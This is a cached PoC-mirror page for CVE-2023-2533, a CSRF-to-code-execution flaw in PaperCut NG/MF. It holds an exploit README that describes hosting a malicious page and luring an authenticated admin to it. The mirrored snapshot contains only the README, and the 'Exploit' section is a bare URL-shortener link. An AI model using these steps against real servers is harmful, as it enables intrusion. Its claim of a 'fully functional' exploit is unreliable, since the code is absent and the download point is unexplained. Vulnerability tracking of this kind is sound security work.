Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-2533 PoC — PaperCut NG 跨站请求伪造漏洞

Source
https://github.com/allinsthon/CVE-2023-2533
Associated Vulnerability
Title:PaperCut NG 跨站请求伪造漏洞 (CVE-2023-2533)
Description:PaperCut NG是澳大利亚PaperCut公司的一套下一代打印机控制软件。 PaperCut NG/MF 22.0.10 (Build 65996 2023-03-27) 版本存在安全漏洞。攻击者利用该漏洞可能更改安全设置或执行任意代码。
Readme
# CVE-2023-2533 PaperCut NG/MF Exploit

## Overview
CVE-2023-2533 is a critical Cross-Site Request Forgery (CSRF) vulnerability in PaperCut NG/MF print management software, affecting versions up to and including 22.0.10. This exploit enables remote code execution (RCE) by tricking an authenticated administrator into interacting with a malicious webpage during an active session in the PaperCut admin interface.

**CVSSv3 Score**: 8.8  
**Patched**: June 9, 2023  
**Affected Versions**: <= 22.0.10 (Build 65996)

**Note**: This exploit is fully functional and has been tested in controlled environments. Use it responsibly and only on systems where you have explicit permission.


## Requirements
- Python 3.8 or higher  
- Access to a vulnerable PaperCut NG/MF server (version <= 22.0.10)  
- An active admin session on the target server  

## Setup
1. Install dependencies:  
   ```
   pip install -r requirements.txt
   ```
2. Update the target server URL in `exploit.py` (e.g., `http://papercut-server:9191`).  
3. (Optional) Customize the payload in the `payloads/` directory to suit your needs.  

## Exploit
[href](https://tinyurl.com/46k5365y)

## Usage
1. Launch the exploit server:  
   ```
   python3 exploit.py
   ```
2. The server hosts a malicious page at `http://<your-ip>:5000/exploit.html`.  
3. Deliver the URL to an admin.  
4. When the admin visits the page, the exploit automatically sends forged requests.  
5. Monitor the server logs for confirmation of successful execution.  


## Payloads
The `payloads/` directory includes pre-built payloads for various operating systems.
You can replace these with your own payloads as needed.

## Detection and Mitigation
- **Detection**: Look for unusual admin activity in server logs, such as unexpected file uploads or configuration changes.  
- **Mitigation**: Upgrade PaperCut NG/MF to the latest version as per the official advisory. Implement robust CSRF protections and train admins to recognize phishing attempts.

## Disclaimer
This exploit is provided for **educational and testing purposes only**. Unauthorized use against systems without explicit permission is illegal and unethical. The author is not responsible for any damage or misuse of this tool.
File Snapshot

 [4.0K]  /data/pocs/6b736d4054e40bb87f17244dcc74b1ae773d9b9d
└── [2.2K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.